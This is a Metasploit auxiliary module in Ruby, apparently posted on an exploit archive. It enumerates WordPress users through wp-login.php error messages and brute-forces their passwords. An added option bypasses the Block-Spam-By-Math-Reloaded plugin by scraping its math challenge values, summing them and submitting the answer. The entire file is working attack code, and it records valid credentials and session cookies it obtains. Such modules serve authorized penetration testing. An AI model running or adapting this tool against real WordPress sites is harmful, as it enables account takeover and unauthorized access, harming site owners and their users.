WordPress Block-Spam-By-Math-Reloaded Plugin Bypass

                                                ##
# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
 
class Metasploit3 < Msf::Auxiliary
 
    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::AuthBrute
    include Msf::Auxiliary::Report
    include Msf::Auxiliary::Scanner
 
 
    def initialize
        super(
            'Name'           => 'Wordpress Brute Force and User Enumeration Utility',
            'Version'        => '$Revision: 12196 $',
            'Description'    => 'Wordpress Authentication Brute Force and User Enumeration Utility',
            'Author'         => [
                'Alligator Security Team',
                'Tiago Ferreira <tiago.ccna[at]gmail.com>',
        'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass
        ],
            'References'     =>
                [
                    ['BID', '35581'],
                    ['CVE', '2009-2335'],
                    ['OSVDB', '55713'],
                ],
            'License'        =>  MSF_LICENSE
        )
 
        register_options(
            [ Opt::RPORT(80),
                OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),
                OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]),
                OptBool.new('BSBM_BYPASS', [ true, "Block-Spam-By-Math-Reloaded Bypass ", false]),
                OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]),
        ], self.class)
 
    end
 
    def target_url
        "http://#{vhost}:#{rport}#{datastore['URI']}"
    end
 
 
    def run_host(ip)
        if datastore['VALIDATE_USERS']
            @users_found = {}
            vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
            each_user_pass { |user, pass|
                do_enum(user)
            }
 
            unless (@users_found.empty?)
                print_good("#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
            end
        end
 
        if datastore['BRUTEFORCE']
            vprint_status("#{target_url} - WordPress Brute Force - Running Bruteforce")
            if datastore['VALIDATE_USERS']
                if @users_found && @users_found.keys.size > 0
                    vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
                else
                    vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
                    return
                end
            end
            each_user_pass { |user, pass|
                if datastore['VALIDATE_USERS']
                    next unless @users_found[user]
                end
                    do_login(user, pass)
            }
        end
    end
 
    def do_enum(user=nil)
        post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login"
        print_status("#{target_url} - WordPress Enumeration - Checking Username:'#{user}'")
 
        begin
 
            res = send_request_cgi({
                'method'  => 'POST',
                'uri'     => datastore['URI'],
                'data'    => post_data,
            }, 20)
 
 
            valid_user = false
 
            if (res and res.code == 200 )
                if (res.body.to_s =~ /Incorrect password/ )
                    valid_user = true
 
                elsif (res.body.to_s =~ /document\.getElementById\(\'user_pass\'\)/ )
                    valid_user = true
 
                else
                    valid_user = false
 
                end
 
            else
                print_error("#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response")
                return :abort
 
            end
 
            if valid_user
                print_good("#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID")
                report_auth_info(
                    :host => rhost,
                    :sname => 'http',
                    :user => user,
                    :port => rport,
                    :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
                )
 
                @users_found[user] = :reported
                return :next_user
            else
                vprint_error("#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'")
                return :skip_user
            end
 
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        rescue ::Timeout::Error, ::Errno::EPIPE
        end
    end
 
  def smartaleck(values)
    answer = 0
    values.each { |a| answer+=a.to_i }
    return answer
  end
 
  def getvalues(response)
    i = 0
    values = []
    while (i <= 1) do
        response.body.match(%r{.?(mathvalue#{i}).*(value=).([\d]+)})
        values[i] = $3
        i += 1
    end
    return values
  end
 
  def baserequest()
    begin
    res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => datastore['URI'],
      }, 20)
    return res
    end
  end
 
 
    def do_login(user=nil,pass=nil)
    if (datastore['BSBM_BYPASS'])
      v = getvalues(baserequest())
      sec_answer = smartaleck(v)
          post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login"
    else
          post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login"
          vprint_status("#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
    end
 
        begin
 
            res = send_request_cgi({
                'method'  => 'POST',
                'uri'     => datastore['URI'],
                'data'    => post_data,
            }, 20)
 
            if (res and res.code == 302 )
                if res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)
                    print_good("#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
                    report_auth_info(
                        :host => rhost,
                        :port => rport,
                        :sname => 'http',
                        :user => user,
                        :pass => pass,
                        :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}",
                        :active => true
                    )
 
                    return :next_user
                end
 
                print_error("#{target_url} - WordPress Brute Force - Unrecognized 302 response")
                return :abort
 
            elsif res.body.to_s =~ /login_error/
                vprint_error("#{target_url} - WordPress Brute Force - Failed to login as '#{user}'")
                return
            else
                print_error("#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response") if res
                return :abort
            end
 
        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        rescue ::Timeout::Error, ::Errno::EPIPE
        end
    end
end